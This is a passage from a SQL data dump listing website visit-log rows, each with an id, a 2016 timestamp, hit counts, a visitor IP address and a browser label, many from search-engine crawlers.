hrome'),(47893,1467921957,1,1,0,0,'157.55.39.126','other'),(47894,1467922740,1,1,0,0,'8.37.234.72','other'),(47895,1467924280,1,1,0,0,'51.255.65.58','other'),(47896,1467924978,1,1,0,0,'78.111.189.4','chrome'),(47897,1467925101,1,0,1,0,'68.180.230.178',''),(47898,1467927354,1,1,0,0,'130.193.50.38','other'),(47899,1467927358,1,1,0,0,'141.8.142.85','other'),(47900,1467927531,1,1,0,0,'178.154.189.37','other'),(47901,1467927896,1,1,0,0,'91.244.17.176','chrome'),(47902,1467930292,1,1,0,0,'164.132.161.66','other'),(47903,1467931495,1,0,1,0,'66.249.78.150',''),(47904,1467931822,2,2,0,0,'141.8.142.58','other'),(47905,1467932454,1,1,0,0,'93.158.152.61','other'),(47906,1467933590,1,1,0,0,'130.193.51.19','other'),(47907,1467934303,1,0,1,0,'66.249.78.178',''),(47908,1467934515,1,0,1,0,'66.249.78.136',''),(47909,1467934630,1,0,1,0,'66.249.78.150',''),(47910,1467935664,1,1,0,0,'130.193.50.6','other'),(47911,1467936113,1,1,0,0,'93.158.152.51','other'),(47912,1467936115,1,1,0,0,'130.193.50.34','other'),(47913,1467936731,2,2,0,0,'141.8.132.10','other'),(47914,1467936848,1,1,0,0,'141.8.142.78','other'),(47915,1467936861,1,1,0,0,'5.255.253.68','other'),(47916,1467938031,1,1,0,0,'207.46.13.71','other'),(47917,1467938492,1,1,0,0,'130.193.51.14','other'),(47918,1467938621,1,1,0,0,'141.8.142.67','other'),(47919,1467938622,1,1,0,0,'178.154.149.10','other'),(47920,1467938749,5,5,0,0,'130.193.50.34','other'),(47921,1467938757,2,2,0,0,'141.8.142.61','other'),(47922,1467938821,1,1,0,0,'180.76.15.157','other'),(47923,1467938947,3,3,0,0,'141.8.183.25','other'),(47924,1467939129,2,2,0,0,'130.193.51.19','other'),(47925,1467939313,1,1,0,0,'51.255.65.64','other'),(47926,1467939691,1,1,0,0,'141.8.142.61','other'),(47927,1467940023,3,3,0,0,'141.8.183.25','other'),(47928,1467940370,2,2,0,0,'130.193.50.34','other'),(47929,1467941853,1,1,0,0,'5.9.62.130','other'),(47930,1467943856,2,0,2,0,'66.249.78.143',''),(47931,1467944173,1,0,1,0,'66.249.78.171',''),(47932,1467944906,1,1,0,0,'130.193.50.34','other'),(47933,1467944908,1,1,0,0,'141.8.142.58','other'),(47934,1467945476,1,1,0,0,'157.55.39.9','other'),(47935,1467945610,2,2,0,0,'141.8.183.25','other'),(47936,1467945611,1,1,0,0,'141.8.142.61','other'),(47937,1467948187,1,1,0,0,'164.132.161.84','other'),(47938,1467948329,1,0,1,0,'66.249.78.164',''),(47939,1467948728,1,1,0,0,'141.8.183.25','other'),(47940,1467948729,1,1,0,0,'141.8.142.61','other'),(47941,1467949121,3,3,0,0,'69.30.221.250','other'),(47942,1467949587,1,0,1,0,'66.249.78.143',''),(47943,1467949726,1,1,0,0,'141.8.142.67','other'),(47944,1467949812,1,1,0,0,'130.193.50.34','other'),(47945,1467949816,2,2,0,0,'141.8.142.58','other'),(47946,1467949820,1,1,0,0,'93.158.152.84','other'),(47947,1467949821,2,2,0,0,'130.193.51.19','other'),(47948,1467950140,1,1,0,0,'208.115.113.82','other'),(47949,1467951529,2,2,0,0,'130.193.50.34','other'),(47950,1467953726,21,21,0,0,'88.217.7.209','other'),(47951,1467953748,1,0,1,0,'66.249.75.207',''),(47952,1467953888,1,1,0,0,'91.196.178.71','chrome'),(47953,1467955077,1,1,0,0,'91.196.178.68','firefox'),(47954,1467955620,1,1,0,0,'141.8.183.25','other'),(47955,1467955622,1,1,0,0,'130.193.50.34','other'),(47956,1467956346,1,1,0,0,'180.76.15.15','other'),(47957,1467957475,1,1,0,0,'5.165.243.223','chrome'),(47958,1467957476,1,1,0,0,'37.110.98.20','chrome'),(47959,1467958003,1,1,0,0,'66.249.93.125','chrome'),(47960,1467958932,1,1,0,0,'5.228.255.32','msie'),(47961,1467958938,1,1,0,0,'95.221.240.234','msie'),(47962,1467961785,1,1,0,0,'91.196.178.65','firefox'),(47963,1467962057,1,1,0,0,'95.132.15.211','chrome'),(47964,1467962316,1,1,0,0,'180.76.15.28','other'),(47965,1467962571,1,1,0,0,'157.55.39.0','other'),(47966,1467962993,1,1,0,0,'130.193.51.19','other'),(47967,1467964181,1,1,0,0,'164.132.161.20','other'),(47968,1467964223,1,0,1,0,'66.249.78.150',''),(47969,1467964413,1,1,0,0,'91.196.178.134','firefox'),(47970,1467966362,1,1,0,0,'178.92.248.6','chrome'),(47971,1467967587,1,1,0,0,'91.230.25.106','chrome'),(47972,1467968257,1,1,0,0,'207.46.13.71','other'),(47973,1467969323,1,1,0,0,'91.196.178.65','firefox'),(47974,1467969453,1,1,0,0,'157.55.39.126','other'),(47975,1467970196,1,1,0,0,'180.76.15.23','other'),(47976,1467972339,2,2,0,0,'130.193.50.34','other'),(47977,1467973305,1,1,0,0,'91.124.239.224','firefox'),(47978,1467973610,1,1,0,0,'130.193.50.34','other'),(47979,1467974403,1,1,0,0,'91.234.78.87','chrome'),(47980,1467974634,1,1,0,0,'151.80.31.106','other'),(47981,1467974891,1,1,0,0,'151.80.31.157','other'),(47982,1467975136,1,1,0,0,'178.92.148.120','chrome'),(47983,1467977004,1,1,0,0,'66.249.78.171','chrome'),(47984,1467977348,1,1,0,0,'77.222.129.146','chrome'),(47985,1467977478,1,1,0,0,'46.211.6.192','chrome'),(47986,1467977684,1,1,0,0,'91.196.178.105','chrome'),(47987,1467977887,1,1,0,0,'66.249.66.177','chrome'),(47988,1467978073,1,1,0,0,'193.227.230.167','msie'),(47989,1467978088,1,1,0,0,'95.135.12.68','opera'),(47990,1467978092,1,1,0,0,'91.196.178.68','chrome'),(47991,1467978111,1,1,0,0,'91.196.178.68','firefox'),(47992,1467978869,1,1,0,0,'37.55.39.185','opera'),(47993,1467980984,1,1,0,0,'130.193.50.34','other'),(47994,1467981152,1,1,0,0,'91.196.178.68','firefox'),(47995,1467981254,2,2,0,0,'141.8.183.25','other'),(47996,1467981302,1,1,0,0,'192.166.132.131','chrome'),(47997,1467981393,2,2,0,0,'130.193.51.19','other'),(47998,1467981703,1,1,0,0,'141.8.142.58','other'),(47999,1467981704,1,1,0,0,'141.8.142.61','other'),(48000,1467985739,1,1,0,0,'178.95.244.17','chrome'),(48001,1467985770,1,1,0,0,'141.8.142.58','other'),(48002,1467985775,1,0,1,0,'66.249.78.143',''),(48003,1467986607,1,0,1,0,'66.249.78.178',''),(48004,1467986857,2,2,0,0,'130.193.50.34','other'),(48005,1467986858,1,1,0,0,'141.8.183.25','other'),(48006,1467987518,1,0,1,0,'66.249.78.136',''),(48007,1467988242,1,1,0,0,'130.193.51.19','other'),(48008,1467988500,1,1,0,0,'141.8.183.25','other'),(48009,1467989089,1,1,0,0,'178.92.248.118','chrome'),(48010,1467989761,1,1,0,0,'91.196.178.71','firefox'),(48011,1467990094,1,1,0,0,'178.92.248.118','chrome'),(48012,1467991164,1,1,0,0,'141.8.142.58','other'),(48013,1467991405,3,3,0,0,'141.8.183.25','other'),(48014,1467991416,2,2,0,0,'130.193.50.34','other'),(48015,1467991836,1,1,0,0,'91.124.239.224','firefox'),(48016,1467995685,1,1,0,0,'52.3.127.144','other'),(48017,1467996164,2,2,0,0,'31.41.93.18','chrome'),(48018,1467996477,1,0,1,0,'66.249.78.150',''),(48019,1467997490,1,1,0,0,'130.193.51.19','other'),(48020,1467997650,1,1,0,0,'141.8.183.25','other'),(48021,1467997802,1,1,0,0,'141.8.142.61','other'),(48022,1467998176,1,1,0,0,'141.8.142.58','other'),(48023,1467998432,3,3,0,0,'130.193.50.34','other'),(48024,1467998916,1,1,0,0,'141.8.142.67','other'),(48025,1467999875,2,2,0,0,'130.193.51.19','other'),(48026,1467999949,3,3,0,0,'130.193.50.34','other'),(48027,1468000199,1,0,1,0,'66.249.78.150',''),(48028,1468001145,1,1,0,0,'157.55.39.0','other'),(48029,1468001525,1,0,1,0,'66.249.75.231',''),(48030,1468001553,1,0,1,0,'66.249.78.164',''),(48031,1468001562,1,0,1,0,'66.249.78.171',''),(48032,1468002481,1,1,0,0,'52.3.127.144','other'),(48033,1468002556,1,1,0,0,'176.96.193.202','firefox'),(48034,1468003289,1,1,0,0,'130.193.51.19','other'),(48035,1468003436,3,3,0,0,'130.193.50.34','other'),(48036,1468003504,1,1,0,0,'180.76.15.140','other'),(48037,1468003747,1,1,0,0,'141.8.183.25','other'),(48038,1468004078,17,17,0,0,'138.201.127.112','other'),(48039,1468004283,2,2,0,0,'141.8.142.58','other'),(48040,1468005004,1,1,0,0,'141.8.142.67','other'),(48041,1468005153,1,1,0,0,'157.55.39.0','other'),(48042,1468006341,1,0,1,0,'66.249.78.150',''),(48043,1468006669,1,1,0,0,'37.55.57.19','chrome'),(48044,1468008036,1,1,0,0,'141.8.183.25','other'),(48045,1468008218,1,1,0,0,'151.80.31.102','other'),(48046,1468008350,1,1,0,0,'130.193.50.34','other'),(48047,1468009576,1,1,0,0,'52.3.127.144','other'),(48048,1468009649,1,1,0,0,'180.76.15.31','other'),(48049,1468010969,1,1,0,0,'91.196.178.163','chrome'),(48050,1468011883,1,1,0,0,'193.194.127.217','firefox'),(48051,1468013411,1,1,0,0,'130.193.50.34','other'),(48052,1468013757,1,1,0,0,'141.8.183.25','other'),(48053,1468014852,1,1,0,0,'130.193.50.34','other'),(48054,1468014869,1,1,0,0,'52.3.127.144','other'),(48055,1468015552,2,2,0,0,'130.193.51.19','other'),(48056,1468015701,1,1,0,0,'141.8.142.61','other'),(48057,1468016253,1,0,1,0,'66.249.78.136',''),(48058,1468016290,1,1,0,0,'130.193.50.34','other'),(48059,1468016983,1,0,1,0,'66.249.78.178',''),(48060,1468017256,1,1,0,0,'157.55.39.126','other'),(48061,1468018116,1,1,0,0,'141.8.183.25','other'),(48062,1468018150,1,1,0,0,'141.8.142.58','other'),(48063,1468018647,1,1,0,0,'130.193.50.34','other'),(48064,1468018984,2,2,0,0,'130.193.51.19','other'),(48065,1468019939,1,1,0,0,'130.193.51.19','other'),(48066,1468021083,1,0,1,0,'66.249.78.178',''),(48067,1468021546,1,1,0,0,'66.249.78.178','chrome'),(48068,1468023208,1,1,0,0,'130.193.50.34','other'),(48069,1468023333,1,1,0,0,'141.8.183.25','other'),(48070,1468023577,1,1,0,0,'130.193.51.19','other'),(48071,1468025122,1,0,1,0,'66.249.66.183',''),(48072,1468025737,1,1,0,0,'141.8.142.61','other'),(48073,1468025739,2,2,0,0,'141.8.183.25','other'),(48074,1468026001,1,0,1,0,'66.249.66.177',''),(48075,1468026098,1,1,0,0,'5.9.85.4','other'),(48076,1468026215,1,0,1,0,'66.249.66.180',''),(48077,1468026373,11,11,0,0,'209.126.127.49','other'),(48078,1468026390,1,1,0,0,'130.193.51.19','other'),(48079,1468029884,1,1,0,0,'51.255.65.91','other'),(48080,1468030146,3,3,0,0,'141.8.183.25','other'),(48081,1468030741,1,0,1,0,'66.249.66.185',''),(48082,1468030903,1,0,1,0,'66.249.66.180',''),(48083,1468032453,1,1,0,0,'130.193.50.34','other'),(48084,1468032454,1,1,0,0,'130.193.51.79','other'),(48085,1468035051,1,1,0,0,'66.249.66.185','chrome'),(48086,1468035279,1,1,0,0,'180.76.15.154','other'),(48087,1468035280,1,1,0,0,'51.255.65.31','other'),(48088,1468035389,1,1,0,0,'66.249.66.177','chrome'),(48089,1468038613,1,1,0,0,'130.193.50.34','other'),(48090,1468038615,1,1,0,0,'141.8.183.25','other'),(48091,1468039474,1,1,0,0,'164.132.161.51','other'),(48092,1468039725,1,1,0,0,'94.23.19.178','other'),(48093,1468041017,1,1,0,0,'130.193.50.34','other'),(48094,1468041023,2,2,0,0,'141.8.142.58','other'),(48095,1468041107,1,1,0,0,'31.41.93.18','chrome'),(48096,1468041884,1,1,0,0,'141.8.183.25','other'),(48097,1468042068,1,1,0,0,'130.193.50.34','other'),(48098,1468042179,1,1,0,0,'157.55.39.0','other'),(48099,1468042928,1,1,0,0,'51.255.65.59','other'),(48100,1468043163,1,1,0,0,'130.193.50.34','other'),(48101,1468044952,1,1,0,0,'180.76.15.18','other'),(48102,1468045601,1,1,0,0,'207.46.13.71','other'),(48103,1468046616,1,1,0,0,'66.249.93.125','chrome'),(48104,1468046870,1,1,0,0,'157.55.39.126','other'),(48105,1468047086,1,1,0,0,'94.179.6.227','firefox'),(48106,1468047104,1,1,0,0,'130.193.50.34','other'),(48107,1468047818,1,1,0,0,'40.77.167.47','other'),(48108,1468048704,1,1,0,0,'51.255.65.6','other'),(48109,1468049809,1,1,0,0,'164.132.161.44','other'),(48110,1468050053,1,0,1,0,'66.249.66.183',''),(48111,1468050850,1,1,0,0,'130.193.50.34','other'),(48112,1468050851,1,1,0,0,'141.8.183.25','other'),(48113,1468052497,1,1,0,0,'149.202.48.207','other'),(48114,1468053899,1,0,1,0,'66.249.66.188',''),(48115,1468054415,1,1,0,0,'40.77.167.47','other'),(48116,1468055889,1,1,0,0,'91.196.178.72','chrome'),(48117,1468056197,1,1,0,0,'52.3.127.144','other'),(48118,1468058887,1,1,0,0,'130.193.50.34','other'),(48119,1468058888,1,1,0,0,'141.8.183.25','other'),(48120,1468059665,1,1,0,0,'207.46.13.71','other'),(48121,1468061291,1,1,0,0,'151.80.31.175','other'),(48122,1468062311,1,1,0,0,'180.76.15.10','other'),(48123,1468062507,1,0,1,0,'66.249.66.180',''),(48124,1468062891,1,1,0,0,'164.132.161.37','other'),(48125,1468063246,1,0,1,0,'66.249.66.182',''),(48126,1468064321,1,1,0,0,'180.76.15.159','other'),(48127,1468064477,1,1,0,0,'5.165.240.22','firefox'),(48128,1468064479,1,1,0,0,'176.193.186.28','opera'),(48129,1468064481,1,1,0,0,'176.77.60.105','firefox'),(48131,1468065243,1,1,0,0,'130.193.50.34','other'),(48132,1468066079,1,0,1,0,'66.249.66.177',''),(48133,1468066276,4,4,0,0,'51.255.207.27','other'),(48134,1468066986,1,0,1,0,'66.249.66.180',''),(48135,1468067568,1,1,0,0,'164.132.161.32','other'),(48136,1468067622,1,0,1,0,'66.249.66.188',''),(48137,1468070826,1,1,0,0,'130.193.50.34','other'),(48138,1468071436,1,1,0,0,'91.124.239.224','firefox'),(48139,1468072107,1,0,1,0,'66.249.66.180',''),(48140,1468073629,1,1,0,0,'51.255.65.41','other'),(48141,1468073927,2,0,2,0,'66.249.66.177',''),(48142,1468073934,1,0,1,0,'66.249.66.185',''),(48143,1468074487,1,1,0,0,'157.55.39.0','other'),(48144,1468074957,1,0,1,0,'66.249.66.182',''),(48145,1468076678,1,1,0,0,'91.196.178.33','opera'),(48146,1468078079,2,2,0,0,'141.8.183.25','other'),(48147,1468079177,1,0,1,0,'66.249.66.183',''),(48148,1468079332,1,1,0,0,'141.8.183.25','other'),(48149,1468079333,1,1,0,0,'141.8.142.58','other'),(48150,1468080343,1,1,0,0,'180.76.15.10','other'),(48151,1468081998,2,0,2,0,'66.249.66.177',''),(48152,1468082075,1,0,1,0,'66.249.66.183',''),(48153,1468082260,1,1,0,0,'93.80.164.169','msie'),(48154,1468082261,1,1,0,0,'176.77.30.181','msie'),(48155,1468082263,1,1,0,0,'95.221.247.13','msie'),(48156,1468082266,1,1,0,0,'93.80.63.183','msie'),(48157,1468082666,1,0,1,0,'66.249.66.180',''),(48158,1468082720,1,0,1,0,'66.249.66.188',''),(48159,1468082859,1,1,0,0,'130.193.50.34','other'),(48160,1468082949,1,1,0,0,'164.132.161.81','other'),(48161,1468083059,1,1,0,0,'66.249.66.182','chrome'),(48162,1468083620,1,0,1,0,'66.249.66.180',''),(48163,1468084684,1,1,0,0,'52.3.127.144','other'),(48164,1468085739,1,1,0,0,'130.193.50.34','other'),(48165,1468086380,1,0,1,0,'66.249.78.150',''),(48166,1468089502,1,1,0,0,'130.193.50.34','other'),(48167,1468090257,1,1,0,0,'164.132.161.45','other'),(48168,1468090732,1,1,0,0,'91.196.178.34','chrome'),(48169,1468090783,1,1,0,0,'91.124.31.195','chrome'),(48170,1468090801,1,1,0,0,'130.193.50.34','other'),(48171,1468090838,1,1,0,0,'91.124.40.227','chrome'),(48172,1468092004,1,1,0,0,'180.76.15.157','other'),(48173,1468092236,1,1,0,0,'130.193.50.34','other'),(48174,1468092238,1,1,0,0,'141.8.132.10','other'),(48175,1468092278,1,1,0,0,'180.76.15.17','other'),(48176,1468093200,1,1,0,0,'141.8.142.61','other'),(48177,1468093201,1,1,0,0,'130.193.51.19','other'),(48178,1468093275,1,0,1,0,'66.249.78.171',''),(48179,1468093421,1,1,0,0,'178.93.148.225','chrome'),(48180,1468093557,1,0,1,0,'66.249.78.178',''),(48181,1468094892,1,0,1,0,'66.249.78.164',''),(48182,1468094960,3,3,0,0,'130.193.50.34','other'),(48183,1468095737,1,1,0,0,'141.8.183.25','other'),(48184,1468096297,1,1,0,0,'180.76.15.15','other'),(48185,1468096473,1,0,1,0,'66.249.78.150',''),(48186,1468096480,1,0,1,0,'66.249.78.164',''),(48187,1468096980,2,2,0,0,'130.193.50.34','other'),(48188,1468097580,3,3,0,0,'141.8.183.25','other'),(48189,1468097594,1,1,0,0,'40.77.167.0','other'),(48190,1468098307,1,1,0,0,'180.76.15.149','other'),(48191,1468098337,4,4,0,0,'130.193.50.34','other'),(48192,1468098467,1,0,1,0,'66.249.78.171',''),(48193,1468098709,2,2,0,0,'141.8.183.25','other'),(48194,1468098710,2,2,0,0,'130.193.51.19','other'),(48195,1468099338,3,3,0,0,'130.193.50.34','other'),(48196,1468099729,1,1,0,0,'141.8.183.25','other'),(48197,1468099872,1,1,0,0,'141.8.142.58','other'),(48198,1468101100,2,2,0,0,'130.193.50.34','other'),(48199,1468101392,1,1,0,0,'141.8.142.67','other'),(48200,1468101458,1,1,0,0,'141.8.183.25','other'),(48201,1468102731,1,0,1,0,'66.249.78.171',''),(48202,1468104337,1,0,1,0,'66.249.78.178',''),(48203,1468106465,3,3,0,0,'130.193.50.34','other'),(48204,1468106694,1,1,0,0,'141.8.183.25','other'),(48205,1468107271,1,1,0,0,'130.193.51.19','other'),(48206,1468107503,1,1,0,0,'130.193.50.34','other'),(48207,1468108325,1,1,0,0,'80.64.173.162','other'),(48208,1468109297,37,37,0,0,'149.202.48.246','other'),(48209,1468110020,4,4,0,0,'130.193.50.34','other'),(48210,1468110127,1,1,0,0,'46.73.227.128','firefox'),(48211,1468110128,1,1,0,0,'95.221.199.248','firefox'),(48213,1468110129,1,1,0,0,'5.165.242.184','msie'),(48214,1468110648,1,0,1,0,'66.249.64.239',''),(48215,1468110872,14,14,0,0,'173.234.153.122','other'),(48216,1468111429,2,0,2,0,'66.249.78.178',''),(48217,1468111938,3,3,0,0,'88.233.235.108','other'),(48218,1468111940,1,0,1,0,'66.249.78.136',''),(48219,1468114202,1,1,0,0,'141.8.183.25','other'),(48220,1468114376,2,2,0,0,'130.193.50.34','other'),(48221,1468114472,1,1,0,0,'66.249.78.228','chrome'),(48222,1468116656,1,0,1,0,'66.249.64.175',''),(48223,1468117555,2,2,0,0,'130.193.50.34','other'),(48224,1468117761,1,1,0,0,'66.249.78.164','chrome'),(48225,1468118919,1,0,1,0,'66.249.78.150',''),(48226,1468119455,2,2,0,0,'130.193.50.34','other'),(48227,1468120853,1,0,1,0,'66.249.78.143',''),(48228,1468121080,1,1,0,0,'130.193.50.34','other'),(48229,1468121271,2,2,0,0,'141.8.183.25','other'),(48230,1468121453,1,1,0,0,'141.8.142.58','other'),(48231,1468121457,1,1,0,0,'130.193.51.19','other'),(48232,1468122602,1,1,0,0,'141.8.142.58','other'),(48233,1468122741,3,3,0,0,'130.193.50.34','other'),(48234,1468124162,1,1,0,0,'207.46.13.71','other'),(48235,1468124228,1,0,1,0,'66.249.78.150',''),(48236,1468124412,1,0,1,0,'66.249.78.178',''),(48237,1468124894,4,4,0,0,'130.193.50.34','other'),(48238,1468124966,1,0,1,0,'66.249.78.136',''),(48239,1468125800,2,2,0,0,'141.8.183.25','other'),(48240,1468125857,1,1,0,0,'130.193.51.19','other'),(48241,1468127693,1,1,0,0,'164.132.161.41','other'),(48242,1468127728,1,0,1,0,'66.249.78.171',''),(48243,1468128105,1,1,0,0,'180.76.15.22','other'),(48244,1468128476,1,1,0,0,'130.193.50.34','other'),(48245,1468128919,1,1,0,0,'51.255.65.41','other'),(48246,1468129313,1,0,1,0,'66.249.78.171',''),(48247,1468129616,2,2,0,0,'130.193.50.34','other'),(48248,1468129655,2,2,0,0,'141.8.183.25','other'),(48249,1468130880,1,1,0,0,'176.77.40.242','msie'),(48250,1468131715,2,2,0,0,'130.193.50.34','other'),(48251,1468132574,1,1,0,0,'130.193.51.19','other'),(48252,1468132696,1,1,0,0,'176.77.117.250','msie'),(48253,1468132844,2,2,0,0,'130.193.50.34','other'),(48254,1468132846,1,1,0,0,'141.8.183.25','other'),(48255,1468133183,1,1,0,0,'91.124.239.224','firefox'),(48256,1468133261,1,1,0,0,'2.93.251.23','msie'),(48257,1468135143,1,1,0,0,'5.255.253.10','other'),(48258,1468135144,1,1,0,0,'5.255.253.9','other'),(48259,1468135146,1,1,0,0,'141.8.142.67','other'),(48260,1468135293,1,1,0,0,'141.8.132.76','other'),(48261,1468136052,1,1,0,0,'141.8.142.25','other'),(48262,1468136616,1,1,0,0,'40.77.167.0','other'),(48263,1468137368,1,1,0,0,'95.24.50.145','msie'),(48264,1468137903,1,0,1,0,'66.249.78.178',''),(48265,1468138616,1,0,1,0,'66.249.78.143',''),(48266,1468139456,2,0,2,0,'66.249.78.164',''),(48267,1468140225,2,2,0,0,'130.193.50.34','other'),(48268,1468141490,1,0,1,0,'66.249.78.136',''),(48269,1468144250,1,0,1,0,'66.249.78.164',''),(48270,1468144937,1,1,0,0,'66.249.93.125','chrome'),(48271,1468145184,1,1,0,0,'51.255.65.50','other'),(48272,1468145675,1,0,1,0,'66.249.78.143',''),(48273,1468146385,1,0,1,0,'66.249.78.171',''),(48274,1468147201,2,2,0,0,'130.193.50.34','other'),(48275,1468150876,1,1,0,0,'91.196.178.166','firefox'),(48276,1468150962,2,2,0,0,'52.3.127.144','other'),(48277,1468152658,1,1,0,0,'91.196.178.35','firefox'),(48278,1468153565,1,1,0,0,'157.55.39.63','other'),(48279,1468154123,3,3,0,0,'141.8.183.25','other'),(48280,1468154125,1,1,0,0,'141.8.142.61','other'),(48281,1468154381,2,2,0,0,'130.193.50.34','other'),(48282,1468154865,1,1,0,0,'66.249.78.178','chrome'),(48283,1468155213,1,1,0,0,'66.249.93.117','chrome'),(48284,1468155312,1,1,0,0,'94.178.12.128','chrome'),(48285,1468157092,1,1,0,0,'178.95.156.191','chrome'),(48286,1468157131,1,1,0,0,'130.193.50.34','other'),(48287,1468158402,2,2,0,0,'194.44.40.253','other'),(48288,1468158607,1,1,0,0,'141.8.183.25','other'),(48289,1468158608,1,1,0,0,'130.193.51.19','other'),(48290,1468160395,2,2,0,0,'141.8.183.25','other'),(48291,1468160399,1,1,0,0,'130.193.50.34','other'),(48292,1468161176,1,1,0,0,'46.211.1.68','msie'),(48293,1468162000,2,0,2,0,'66.249.78.143',''),(48294,1468162411,1,1,0,0,'157.55.39.63','other'),(48295,1468162972,1,1,0,0,'193.194.127.203','firefox'),(48296,1468163792,1,0,1,0,'66.249.78.150',''),(48297,1468163822,1,1,0,0,'66.249.78.136','chrome'),(48298,1468164009,1,1,0,0,'95.134.169.132','chrome'),(48299,1468165056,1,0,1,0,'66.249.78.171',''),(48300,1468165113,2,0,2,0,'66.249.78.136',''),(48301,1468165133,2,2,0,0,'130.193.51.19','other'),(48302,1468167478,1,1,0,0,'93.72.129.64','chrome'),(48303,1468167771,1,1,0,0,'91.196.178.102','chrome'),(48304,1468168175,1,1,0,0,'130.193.50.34','other'),(48305,1468168176,1,1,0,0,'130.193.51.19','other'),(48306,1468168437,1,1,0,0,'91.196.178.72','opera'),(48307,1468169161,1,1,0,0,'141.8.183.25','other'),(48308,1468170100,1,1,0,0,'91.196.178.35','firefox'),(48309,1468170159,1,1,0,0,'164.132.161.41','other'),(48310,1468172558,1,0,1,0,'66.249.78.164',''),(48311,1468173209,2,0,2,0,'66.249.78.178',''),(48312,1468173328,1,1,0,0,'130.193.50.34','other'),(48313,1468173330,1,1,0,0,'141.8.183.25','other'),(48314,1468173725,1,0,1,0,'66.249.78.136',''),(48315,1468174371,1,1,0,0,'164.132.161.10','other'),(48316,1468174462,1,1,0,0,'141.0.15.210','other'),(48317,1468174768,2,2,0,0,'141.8.183.25','other'),(48318,1468174890,1,0,1,0,'68.180.230.178',''),(48319,1468175007,1,1,0,0,'91.124.239.224','firefox'),(48320,1468175392,1,1,0,0,'130.193.50.34','other'),(48321,1468176349,4,4,0,0,'130.193.50.34','other'),(48322,1468177063,1,0,1,0,'66.249.78.178',''),(48323,1468178073,1,1,0,0,'141.8.142.58','other'),(48324,1468178260,1,0,1,0,'68.180.229.112',''),(48325,1468178302,2,2,0,0,'130.193.50.34','other'),(48326,1468178734,1,1,0,0,'141.8.183.25','other'),(48327,1468178737,1,1,0,0,'141.8.142.61','other'),(48328,1468179688,1,1,0,0,'69.30.234.2','other'),(48329,1468180148,1,1,0,0,'130.193.50.34','other'),(48330,1468180172,1,0,1,0,'66.249.78.178',''),(48331,1468180180,1,0,1,0,'66.249.78.171',''),(48332,1468182065,2,2,0,0,'141.8.183.25','other'),(48333,1468182325,1,1,0,0,'130.193.50.34','other'),(48334,1468182607,1,0,1,0,'66.249.78.143',''),(48335,1468182790,1,1,0,0,'94.179.43.120','chrome'),(48336,1468182793,1,0,1,0,'66.249.78.136',''),(48337,1468183552,1,1,0,0,'104.131.68.124','other'),(48338,1468185353,2,0,2,0,'66.249.78.178',''),(48339,1468185869,1,1,0,0,'164.132.161.5','other'),(48340,1468186652,1,0,1,0,'66.249.78.178',''),(48341,1468186980,2,2,0,0,'130.193.51.19','other'),(48342,1468186989,1,1,0,0,'130.193.50.34','other'),(48343,1468188027,1,1,0,0,'51.255.65.95','other'),(48344,1468188528,1,1,0,0,'141.8.142.61','other'),(48345,1468189251,2,2,0,0,'130.193.50.34','other'),(48346,1468189514,1,1,0,0,'141.8.142.61','other'),(48347,1468189630,1,1,0,0,'52.3.127.144','other'),(48348,1468189671,1,1,0,0,'141.8.183.25','other'),(48349,1468189986,1,0,1,0,'66.249.78.178',''),(48350,1468190987,1,1,0,0,'51.255.65.29','other'),(48351,1468193300,1,1,0,0,'141.8.183.25','other'),(48352,1468193363,1,0,1,0,'66.249.78.136',''),(48353,1468193486,1,0,1,0,'66.249.78.171',''),(48354,1468193534,1,1,0,0,'46.73.249.10','msie'),(48355,1468195609,1,1,0,0,'2.93.40.79','msie'),(48356,1468196482,2,2,0,0,'141.8.183.25','other'),(48357,1468196752,1,1,0,0,'141.8.142.61','other'),(48358,1468196884,3,3,0,0,'130.193.50.34','other'),(48359,1468197223,2,2,0,0,'51.255.194.32','other'),(48360,1468197936,1,0,1,0,'66.249.78.171',''),(48361,1468198868,1,1,0,0,'157.55.39.63','other'),(48362,1468198882,1,0,1,0,'66.249.78.164',''),(48363,1468200273,1,1,0,0,'141.8.183.25','other'),(48364,1468202931,1,1,0,0,'66.249.78.150','chrome'),(48365,1468202980,1,1,0,0,'66.249.78.171','chrome'),(48366,1468203156,1,1,0,0,'141.8.142.88','other'),(48367,1468203445,1,1,0,0,'141.8.142.67','other'),(48368,1468203548,1,0,1,0,'66.249.64.170',''),(48369,1468203575,1,1,0,0,'130.193.50.6','other'),(48370,1468203747,2,2,0,0,'93.158.152.9','other'),(48371,1468203748,1,1,0,0,'93.158.152.61','other'),(48372,1468203846,1,1,0,0,'51.255.65.50','other'),(48373,1468203870,1,1,0,0,'93.158.152.75','other'),(48374,1468204175,1,1,0,0,'5.255.253.36','other'),(48375,1468204181,1,1,0,0,'5.255.253.10','other'),(48377,1468204353,1,1,0,0,'141.8.132.79','other'),(48378,1468204355,1,1,0,0,'93.158.152.46','other'),(48379,1468205888,1,0,1,0,'66.249.78.136',''),(48380,1468206511,1,1,0,0,'130.193.51.74','other'),(48381,1468206933,1,1,0,0,'178.154.189.31','other'),(48382,1468207435,1,1,0,0,'141.8.132.41','other'),(48383,1468207438,1,1,0,0,'141.8.142.78','other'),(48384,1468207891,1,1,0,0,'130.193.50.34','other'),(48385,1468208219,1,1,0,0,'178.154.189.37','other'),(48386,1468208413,1,1,0,0,'141.8.183.19','other'),(48387,1468209303,1,1,0,0,'157.55.39.63','other'),(48388,1468209315,1,0,1,0,'66.249.78.164',''),(48389,1468209925,2,2,0,0,'178.154.189.31','other'),(48390,1468209926,1,1,0,0,'141.8.132.41','other'),(48391,1468210406,1,1,0,0,'130.193.51.79','other'),(48392,1468210765,1,1,0,0,'178.154.149.10','other'),(48393,1468210837,1,1,0,0,'207.46.13.109','other'),(48394,1468211654,1,1,0,0,'130.193.50.34','other'),(48395,1468211655,1,1,0,0,'141.8.183.25','other'),(48396,1468211792,1,1,0,0,'130.193.51.74','other'),(48397,1468212312,1,0,1,0,'66.249.78.143',''),(48398,1468212579,1,0,1,0,'66.249.78.178',''),(48399,1468213500,1,0,1,0,'66.249.78.171',''),(48400,1468213628,1,1,0,0,'91.196.178.69','firefox'),(48401,1468214136,1,1,0,0,'176.120.60.210','chrome'),(48402,1468214900,1,1,0,0,'66.102.9.103','chrome'),(48403,1468214991,1,1,0,0,'141.8.183.25','other'),(48404,1468215098,1,1,0,0,'130.193.51.19','other'),(48405,1468215996,1,1,0,0,'5.255.253.55','other'),(48406,1468215998,1,1,0,0,'141.8.142.41','other'),(48407,1468216738,1,1,0,0,'141.8.132.2','other'),(48408,1468217860,1,1,0,0,'141.8.132.41','other'),(48409,1468218263,1,1,0,0,'130.193.51.79','other'),(48410,1468218394,1,1,0,0,'